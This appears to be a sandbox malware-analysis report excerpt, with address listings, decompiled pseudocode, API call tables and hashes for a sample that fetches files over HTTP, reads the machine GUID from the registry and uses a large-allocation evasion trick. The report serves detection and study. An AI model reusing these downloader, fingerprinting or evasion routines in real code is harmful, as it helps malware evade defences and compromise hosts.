                                                                                0x0040a1fd
                                                                                0x0040a203
                                                                                0x0040a208
                                                                                0x0040a20c
                                                                                0x0040a212
                                                                                0x0040a212
                                                                                0x0040a237
                                                                                0x0040a239
                                                                                0x0040a23f
                                                                                0x0040a248
                                                                                0x0040a24a
                                                                                0x0040a254
                                                                                0x0040a254
                                                                                0x0040a259
                                                                                0x0040a264
                                                                                0x0040a266
                                                                                0x0040a273
                                                                                0x0040a273
                                                                                0x0040a278
                                                                                0x0040a27b
                                                                                0x0040a284
                                                                                0x0040a297
                                                                                0x0040a29e
                                                                                0x0040a2a0
                                                                                0x0040a2a0
                                                                                0x0040a2a6
                                                                                0x0040a286
                                                                                0x0040a28d
                                                                                0x0040a28f
                                                                                0x0040a28f
                                                                                0x0040a28d
                                                                                0x0040a2ac
                                                                                0x0040a2ae
                                                                                0x0040a2b5
                                                                                0x0040a2bb
                                                                                0x0040a2bd
                                                                                0x0040a2bd
                                                                                0x0040a2c3
                                                                                0x0040a2c9
                                                                                0x0040a2ca
                                                                                0x0040a2d1
                                                                                0x0040a2d2
                                                                                0x0040a2dc
                                                                                0x0040a2e2
                                                                                0x0040a2e8
                                                                                0x0040a2ed
                                                                                0x0040a2f6
                                                                                0x0040a2fa
                                                                                0x0040a302
                                                                                0x0040a304
                                                                                0x0040a308
                                                                                0x0040a322
                                                                                0x0040a34c
                                                                                0x0040a351
                                                                                0x0040a358
                                                                                0x0040a358
                                                                                0x0040a358
                                                                                0x0040a324
                                                                                0x0040a333
                                                                                0x0040a338
                                                                                0x0040a33c
                                                                                0x0040a33c
                                                                                0x0040a364
                                                                                0x0040a36d
                                                                                0x0040a36f
                                                                                0x0040a376
                                                                                0x0040a379
                                                                                0x0040a379
                                                                                0x0040a37e
                                                                                0x0040a389
                                                                                0x0040a38b
                                                                                0x0040a392
                                                                                0x0040a398
                                                                                0x0040a398
                                                                                0x0040a3a7
                                                                                0x0040a3ac
                                                                                0x0040a3b2
                                                                                0x0040a3d4
                                                                                0x0040a3da
                                                                                0x0040a3e4
                                                                                0x0040a3ea
                                                                                0x0040a3f0
                                                                                0x0040a3f5
                                                                                0x0040a3fc
                                                                                0x0040a3fc
                                                                                0x0040a3fc
                                                                                0x0040a400
                                                                                0x0040a3b4
                                                                                0x0040a3bf
                                                                                0x0040a3c4
                                                                                0x0040a3c8
                                                                                0x0040a3c8
                                                                                0x0040a40b
                                                                                0x0040a414
                                                                                0x0040a416
                                                                                0x0040a41d
                                                                                0x0040a423
                                                                                0x0040a423
                                                                                0x0040a428
                                                                                0x0040a433
                                                                                0x0040a435
                                                                                0x0040a43c
                                                                                0x0040a43f
                                                                                0x0040a43f
                                                                                0x0040a444
                                                                                0x0040a44a
                                                                                0x0040a44c
                                                                                0x0040a44c
                                                                                0x0040a45b
                                                                                0x0040a465
                                                                                0x0040a469
                                                                                0x0040a471
                                                                                0x0040a474
                                                                                0x0040a478
                                                                                0x0040a47d
                                                                                0x0040a482
                                                                                0x0040a4a8
                                                                                0x0040a4ae
                                                                                0x0040a4b8
                                                                                0x0040a4be
                                                                                0x0040a4c4
                                                                                0x0040a4c9
                                                                                0x0040a4d0
                                                                                0x0040a4d0
                                                                                0x0040a4d0
                                                                                0x0040a4d7
                                                                                0x0040a484
                                                                                0x0040a493
                                                                                0x0040a498
                                                                                0x0040a49c
                                                                                0x0040a49c
                                                                                0x0040a4e2
                                                                                0x0040a4eb
                                                                                0x0040a4ed
                                                                                0x0040a4f7
                                                                                0x0040a4fd
                                                                                0x0040a4fd
                                                                                0x0040a502
                                                                                0x0040a50d
                                                                                0x0040a50f
                                                                                0x0040a516
                                                                                0x0040a519
                                                                                0x0040a519
                                                                                0x0040a52b
                                                                                0x0040a530
                                                                                0x0040a536
                                                                                0x0040a55e
                                                                                0x0040a564
                                                                                0x0040a56e
                                                                                0x0040a574
                                                                                0x0040a57a
                                                                                0x0040a57f
                                                                                0x0040a586
                                                                                0x0040a586
                                                                                0x0040a586
                                                                                0x0040a58d
                                                                                0x0040a538
                                                                                0x0040a546
                                                                                0x0040a54b
                                                                                0x0040a54f
                                                                                0x0040a54f
                                                                                0x0040a598
                                                                                0x0040a5a4
                                                                                0x0040a5a6
                                                                                0x0040a5b0
                                                                                0x0040a5b6
                                                                                0x0040a5b6
                                                                                0x0040a5bb
                                                                                0x0040a5c9
                                                                                0x0040a5cb
                                                                                0x0040a5d5
                                                                                0x0040a5d8
                                                                                0x0040a5d8
                                                                                0x0040a5e1
                                                                                0x0040a5e7
                                                                                0x0040a60a
                                                                                0x0040a60f
                                                                                0x0040a616
                                                                                0x0040a616
                                                                                0x0040a616
                                                                                0x0040a5e9
                                                                                0x0040a5f4
                                                                                0x0040a5f9
                                                                                0x0040a5fd
                                                                                0x0040a5fd
                                                                                0x0040a625
                                                                                0x0040a634
                                                                                0x0040a636
                                                                                0x0040a642
                                                                                0x0040a642
                                                                                0x0040a647
                                                                                0x0040a655
                                                                                0x0040a65f
                                                                                0x0040a65f
                                                                                0x0040a66b
                                                                                0x0040a66e
                                                                                0x0040a670
                                                                                0x0040a670
                                                                                0x0040a674
                                                                                0x0040a681
                                                                                0x0040a687
                                                                                0x0040a689
                                                                                0x0040a689
                                                                                0x0040a690
                                                                                0x0040a69f
                                                                                0x0040a6a5
                                                                                0x0040a6ae
                                                                                0x0040a6be
                                                                                0x0040a6c3
                                                                                0x0040a6b0
                                                                                0x0040a6b0
                                                                                0x0040a6b5
                                                                                0x0040a6c7
                                                                                0x0040a7ad
                                                                                0x0040a7b3
                                                                                0x00000000
                                                                                0x0040a6cd
                                                                                0x0040a6d4
                                                                                0x0040a6d7
                                                                                0x0040a6d9
                                                                                0x0040a6d9
                                                                                0x0040a6e7
                                                                                0x0040a6ed
                                                                                0x0040a6f2
                                                                                0x0040a7a4
                                                                                0x0040a7a7
                                                                                0x00000000
                                                                                0x0040a6f8
                                                                                0x0040a6ff
                                                                                0x0040a705
                                                                                0x0040a707
                                                                                0x0040a707
                                                                                0x0040a719
                                                                                0x0040a71f
                                                                                0x0040a723
                                                                                0x0040a79b
                                                                                0x0040a79e
                                                                                0x00000000
                                                                                0x0040a725
                                                                                0x0040a72a
                                                                                0x0040a731
                                                                                0x0040a742
                                                                                0x0040a751
                                                                                0x0040a760
                                                                                0x0040a761
                                                                                0x0040a767
                                                                                0x0040a76c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a76e
                                                                                0x0040a771
                                                                                0x0040a784
                                                                                0x0040a78d
                                                                                0x0040a78d
                                                                                0x0040a795
                                                                                0x00000000
                                                                                0x0040a795
                                                                                0x0040a753
                                                                                0x0040a753
                                                                                0x0040a7b4
                                                                                0x0040a7b4
                                                                                0x0040a7b7
                                                                                0x0040a7be
                                                                                0x0040a7c3
                                                                                0x0040a7c5
                                                                                0x0040a7cf
                                                                                0x0040a7d9
                                                                                0x0040a7e3
                                                                                0x0040a7f0
                                                                                0x0040a7fa
                                                                                0x0040a807
                                                                                0x0040a814
                                                                                0x0040a81e
                                                                                0x0040a826
                                                                                0x0040a827
                                                                                0x0040a828
                                                                                0x0040a83d
                                                                                0x0040a83d
                                                                                0x0040a723
                                                                                0x0040a6f2
                                                                                0x0040a6c7
                                                                                0x0040a1a5
                                                                                0x0040a1ae
                                                                                0x0040a1bb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 0040A674
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 0040A690
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040A69F
                                                                                • InternetConnectA.WININET(000000FF,?,00000050,00000000,00000000,00000003,04000000,00000000), ref: 0040A6E7
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04000000,00000000), ref: 0040A719
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040A72A
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,0000000F,00000000), ref: 0040A749
                                                                                • InternetReadFile.WININET(00000000,?,00000BB7,00000400), ref: 0040A784
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040A795
                                                                                • InternetCloseHandle.WININET(?), ref: 0040A79E
                                                                                • InternetCloseHandle.WININET(000000FF), ref: 0040A7A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp_memmove$CacheDeleteEntryOpenRequest$ConnectFileH_prolog3InfoQueryReadSend
                                                                                • String ID: ERROR$GET$http://$https://
                                                                                • API String ID: 1920747694-367639009
                                                                                • Opcode ID: 3f02466a9703aac3a4d8f2ceb8fb06137037ed84cd26ad318aaebe01eba41b90
                                                                                • Instruction ID: ed55058a10d5b21ec2d82e062bda0fed0c62309adfb4b3dff29228fbd62cc646
                                                                                • Opcode Fuzzy Hash: 3f02466a9703aac3a4d8f2ceb8fb06137037ed84cd26ad318aaebe01eba41b90
                                                                                • Instruction Fuzzy Hash: 00228D7180128CEEEB34DFA4CD45BEE77B8BF11318F10462AE955A71C1CBB85A08CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 574 c6ea60-c6ea64 575 c6ea6b-c6ea75 574->575 576 c6ea77-c6eaae ContinueDebugEvent GetSystemDirectoryW VirtualAlloc ActivateKeyboardLayout AcquireSRWLockShared 575->576 577 c6eab4-c6eab8 575->577 576->577 578 c6eaba-c6eabe 577->578 579 c6eacb-c6eadb 577->579 578->579 580 c6eac0-c6eac9 578->580 579->575 581 c6eadd-c6eaed GetModuleHandleW call c6c050 579->581 580->581 583 c6eaf2 581->583 584 c6eeae 583->584 584->584
                                                                                APIs
                                                                                • ContinueDebugEvent.KERNEL32(00000000,00000000,00000000), ref: 00C6EA7D
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6EA87
                                                                                • VirtualAlloc.KERNEL32(00000000,001914BD,00003000,00000004), ref: 00C6EA9C
                                                                                • ActivateKeyboardLayout.USER32(00000000,00000000), ref: 00C6EAA6
                                                                                • AcquireSRWLockShared.KERNEL32(00000000), ref: 00C6EAAE
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 00C6EAE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AcquireActivateAllocContinueDebugDirectoryEventHandleKeyboardLayoutLockModuleSharedSystemVirtual
                                                                                • String ID: K$KERNEL32.dll
                                                                                • API String ID: 3644739094-3624158019
                                                                                • Opcode ID: c8de8a46f56204f6c38f249ad1c179496cfa5cc47601148c737d47e886cc0140
                                                                                • Instruction ID: 1cb5e492967e6adc5a9135447f52ebe34b0be9d68ae43c574a70078d57313f9e
                                                                                • Opcode Fuzzy Hash: c8de8a46f56204f6c38f249ad1c179496cfa5cc47601148c737d47e886cc0140
                                                                                • Instruction Fuzzy Hash: B0012C74644344EFEB30DBD2DD8AB5D7B64BF01B07F288016FB069A2D1C7B15A40AB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 88%
                                                                                			E00415C6D(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				long _t23;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119, _t44 - 0x80); // executed
                                                                                				if(_t23 == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "MachineGuid", 0, 0, _t44 + 0x88, _t44 - 0x7c); // executed
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}












                                                                                0x00415c6d
                                                                                0x00415c6d
                                                                                0x00415c6e
                                                                                0x00415c7b
                                                                                0x00415c82
                                                                                0x00415c96
                                                                                0x00415c9b
                                                                                0x00415ca2
                                                                                0x00415ca8
                                                                                0x00415cc4
                                                                                0x00415ccc
                                                                                0x00415ce3
                                                                                0x00415ce3
                                                                                0x00415cec
                                                                                0x00415cfd
                                                                                0x00415d06
                                                                                0x00415d0d
                                                                                0x00415d13
                                                                                0x00415d15
                                                                                0x00415d24
                                                                                0x00415d31

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415CA8
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00415CC4
                                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,?), ref: 00415CE3
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00415CEC
                                                                                • CharToOemA.USER32(?,?), ref: 00415CFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                • API String ID: 2235053359-1211650757
                                                                                • Opcode ID: 38d0e98b8721e1a31ea6c3f9266c94ef96804df4a2f9be150f560df5f57cf177
                                                                                • Instruction ID: 5cdff529ecc6d4c3c2bed252064c6ea5fe031ea7453f6196bc54f06f4fad6540
                                                                                • Opcode Fuzzy Hash: 38d0e98b8721e1a31ea6c3f9266c94ef96804df4a2f9be150f560df5f57cf177
                                                                                • Instruction Fuzzy Hash: 7E114CB194020CAFEB309FA4DC85BEEBBACEB04348F50402AF515D6151DA749A488B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(00000014,00000020), ref: 00C6FC3A
                                                                                  • Part of subcall function 00C71BED: __lock.LIBCMT ref: 00C71C0B
                                                                                  • Part of subcall function 00C71BED: ___sbh_find_block.LIBCMT ref: 00C71C16
                                                                                  • Part of subcall function 00C71BED: ___sbh_free_block.LIBCMT ref: 00C71C25
                                                                                  • Part of subcall function 00C71BED: HeapFree.KERNEL32(00000000,00000000,00DAAAF0,0000000C,00C73F9D,00000000,00DAABD0,0000000C,00C73FD7,00000000,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C), ref: 00C71C55
                                                                                  • Part of subcall function 00C71BED: GetLastError.KERNEL32(?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001,00000214), ref: 00C71C66
                                                                                • _malloc.LIBCMT ref: 00C6FC76
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00C6FC8E
                                                                                • GetCurrentHwProfileW.ADVAPI32(00000000), ref: 00C6FC96
                                                                                • task.LIBCPMTD ref: 00C6FC9F
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00C6FD12
                                                                                • _setbuf.LIBCMT ref: 00C6FD47
                                                                                • _calloc.LIBCMT ref: 00C6FD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AffinityCurrentErrorExchangeFreeHeapInterlockedLastLibraryLoadMaskProcessProfile___sbh_find_block___sbh_free_block__lock_calloc_malloc_setbuftask
                                                                                • String ID:
                                                                                • API String ID: 2850343420-0
                                                                                • Opcode ID: 3d595dd68b40f9c1b77083727e9b3ff24a08b89be634cf1d79c57be20f0f9499
                                                                                • Instruction ID: ed89e17bd1eceb01ba0d75b6adefe35ee4a2f511c8aa1c773a96616809a67348
                                                                                • Opcode Fuzzy Hash: 3d595dd68b40f9c1b77083727e9b3ff24a08b89be634cf1d79c57be20f0f9499
                                                                                • Instruction Fuzzy Hash: 0C418670E04208EBDB20EFE4E886B9D7771EF14701F144029E606AB2D1EBB55A45D766
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 634 41eb16-41eb1e 635 41eb2d-41eb38 call 41e042 634->635 638 41eb20-41eb2b call 42482a 635->638 639 41eb3a-41eb3b 635->639 638->635 642 41eb3c-41eb4d 638->642 643 41eb7b-41eb95 call 41e1e3 call 421126 642->643 644 41eb4f-41eb7a call 41e0d6 call 41dfe6 642->644 644->643
                                                                                C-Code - Quality: 93%
                                                                                			E0041EB16(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                				char* _v8;
                                                                                				signed int _v16;
                                                                                				char _v20;
                                                                                				void* __ebp;
                                                                                				void* _t34;
                                                                                				signed int _t35;
                                                                                				signed int _t39;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t44;
                                                                                				void* _t51;
                                                                                				intOrPtr* _t54;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				void* _t63;
                                                                                				void* _t64;
                                                                                				void* _t66;
                                                                                				intOrPtr* _t68;
                                                                                
                                                                                				_t66 = __esi;
                                                                                				_t64 = __edi;
                                                                                				_t63 = __edx;
                                                                                				_t51 = __ebx;
                                                                                				while(1) {
                                                                                					_t2 =  &_a4; // 0x404024, executed
                                                                                					_t34 = E0041E042(_t63, _t64, _t66,  *_t2); // executed
                                                                                					if(_t34 != 0) {
                                                                                						return _t34;
                                                                                					}
                                                                                					_t35 = E0042482A(_t34, _a4);
                                                                                					__eflags = _t35;
                                                                                					if(_t35 == 0) {
                                                                                						__eflags =  *0x448dbc & 0x00000001;
                                                                                						if(( *0x448dbc & 0x00000001) == 0) {
                                                                                							 *0x448dbc =  *0x448dbc | 0x00000001;
                                                                                							__eflags =  *0x448dbc;
                                                                                							_push(1);
                                                                                							_v8 = "bad allocation";
                                                                                							E0041E0D6(0x448db0,  &_v8);
                                                                                							 *0x448db0 = 0x43834c;
                                                                                							E0041DFE6( *0x448dbc, 0x437af8);
                                                                                						}
                                                                                						_t54 =  &_v20;
                                                                                						E0041E1E3(_t54, 0x448db0);
                                                                                						_v20 = 0x43834c;
                                                                                						E00421126( &_v20, 0x4441e0);
                                                                                						asm("int3");
                                                                                						_t39 = _v16;
                                                                                						_push(0x43834c);
                                                                                						_t68 = _t54;
                                                                                						 *((char*)(_t68 + 0xc)) = 0;
                                                                                						__eflags = _t39;
                                                                                						if(__eflags != 0) {
                                                                                							 *_t68 =  *_t39;
                                                                                							_t32 = _t39 + 4; // 0x403290
                                                                                							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
                                                                                						} else {
                                                                                							_t42 = E00427B66(_t63, 0x448db0, __eflags);
                                                                                							 *((intOrPtr*)(_t68 + 8)) = _t42;
                                                                                							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
                                                                                							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
                                                                                							__eflags =  *_t68 -  *0x447e38; // 0x37b1498
                                                                                							if(__eflags != 0) {
                                                                                								_t60 =  *0x447bf0; // 0xfffffffe
                                                                                								__eflags =  *(_t42 + 0x70) & _t60;
                                                                                								if(__eflags == 0) {
                                                                                									 *_t68 = E0042793D(_t51, _t63, 0x448db0, _t68, __eflags);
                                                                                								}
                                                                                							}
                                                                                							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x447af8; // 0x37b1658
                                                                                							if(__eflags != 0) {
                                                                                								_t59 =  *0x447bf0; // 0xfffffffe
                                                                                								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
                                                                                								if(__eflags == 0) {
                                                                                									 *((intOrPtr*)(_t68 + 4)) = E004271BC(_t51, _t63, 0x448db0, _t68, __eflags);
                                                                                								}
                                                                                							}
                                                                                							_t44 =  *((intOrPtr*)(_t68 + 8));
                                                                                							__eflags =  *(_t44 + 0x70) & 0x00000002;
                                                                                							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
                                                                                								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
                                                                                								 *((char*)(_t68 + 0xc)) = 1;
                                                                                							}
                                                                                						}
                                                                                						return _t68;
                                                                                					} else {
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                			}




















                                                                                0x0041eb16
                                                                                0x0041eb16
                                                                                0x0041eb16
                                                                                0x0041eb16
                                                                                0x0041eb2d
                                                                                0x0041eb2d
                                                                                0x0041eb30
                                                                                0x0041eb38
                                                                                0x0041eb3b
                                                                                0x0041eb3b
                                                                                0x0041eb23
                                                                                0x0041eb29
                                                                                0x0041eb2b
                                                                                0x0041eb3c
                                                                                0x0041eb4d
                                                                                0x0041eb4f
                                                                                0x0041eb4f
                                                                                0x0041eb56
                                                                                0x0041eb5e
                                                                                0x0041eb65
                                                                                0x0041eb6f
                                                                                0x0041eb75
                                                                                0x0041eb7a
                                                                                0x0041eb7c
                                                                                0x0041eb7f
                                                                                0x0041eb8d
                                                                                0x0041eb90
                                                                                0x0041eb95
                                                                                0x0041eb9b
                                                                                0x0041eb9e
                                                                                0x0041eb9f
                                                                                0x0041eba1
                                                                                0x0041eba5
                                                                                0x0041eba7
                                                                                0x0041ec0e
                                                                                0x0041ec10
                                                                                0x0041ec13
                                                                                0x0041eba9
                                                                                0x0041eba9
                                                                                0x0041ebae
                                                                                0x0041ebb4
                                                                                0x0041ebb9
                                                                                0x0041ebbe
                                                                                0x0041ebc4
                                                                                0x0041ebc6
                                                                                0x0041ebcc
                                                                                0x0041ebcf
                                                                                0x0041ebd6
                                                                                0x0041ebd6
                                                                                0x0041ebcf
                                                                                0x0041ebdb
                                                                                0x0041ebe1
                                                                                0x0041ebe6
                                                                                0x0041ebec
                                                                                0x0041ebef
                                                                                0x0041ebf6
                                                                                0x0041ebf6
                                                                                0x0041ebef
                                                                                0x0041ebf9
                                                                                0x0041ebfc
                                                                                0x0041ec00
                                                                                0x0041ec02
                                                                                0x0041ec06
                                                                                0x0041ec06
                                                                                0x0041ec00
                                                                                0x0041ec1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041eb2b

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0041EB30
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • std::exception::exception.LIBCMT ref: 0041EB65
                                                                                • std::exception::exception.LIBCMT ref: 0041EB7F
                                                                                • __CxxThrowException@8.LIBCMT ref: 0041EB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                • String ID: $@@
                                                                                • API String ID: 615853336-1184905659
                                                                                • Opcode ID: c4afc4dd115130b1d55c1ea54a5313bd1ec4a872847ccb5b5bd61b576586f813
                                                                                • Instruction ID: e1db1529a4c6848ebdd2f33c6fe06aebc7df97a68ba4e8e95e8b6dedacd21b49
                                                                                • Opcode Fuzzy Hash: c4afc4dd115130b1d55c1ea54a5313bd1ec4a872847ccb5b5bd61b576586f813
                                                                                • Instruction Fuzzy Hash: 32F0F97890421966DB14FB57DC02ADE7A69AF95718F10402FFC01961D2DFBCAB81CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 653 401102-401120 VirtualAlloc 654 401122-401125 653->654 655 401127-40112d 653->655 654->655 656 401156-401159 655->656 657 40112f-401150 call 427e30 VirtualFree 655->657 657->656
                                                                                C-Code - Quality: 47%
                                                                                			E00401102(void* __ecx) {
                                                                                				void* _t1;
                                                                                				void* _t3;
                                                                                				void* _t9;
                                                                                
                                                                                				_t1 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
                                                                                				_t9 = _t1;
                                                                                				_push(_t1);
                                                                                				if(_t1 != 0x11) {
                                                                                					asm("cld");
                                                                                				}
                                                                                				asm("clc");
                                                                                				_pop(_t3);
                                                                                				if(_t9 != 0) {
                                                                                					E00427E30(_t9, 0, 0x5e69ec0);
                                                                                					asm("cld");
                                                                                					return VirtualFree(_t9, 0x17c841c0, 0x8000);
                                                                                				}
                                                                                				return _t3;
                                                                                			}






                                                                                0x00401114
                                                                                0x0040111a
                                                                                0x0040111c
                                                                                0x00401120
                                                                                0x00401124
                                                                                0x00401125
                                                                                0x00401129
                                                                                0x0040112a
                                                                                0x0040112d
                                                                                0x0040113a
                                                                                0x00401147
                                                                                0x00000000
                                                                                0x00401150
                                                                                0x00401159

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,00000000,00000010,?,0040C5C0), ref: 00401114
                                                                                • _memset.LIBCMT ref: 0040113A
                                                                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,0040C5C0), ref: 00401150
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
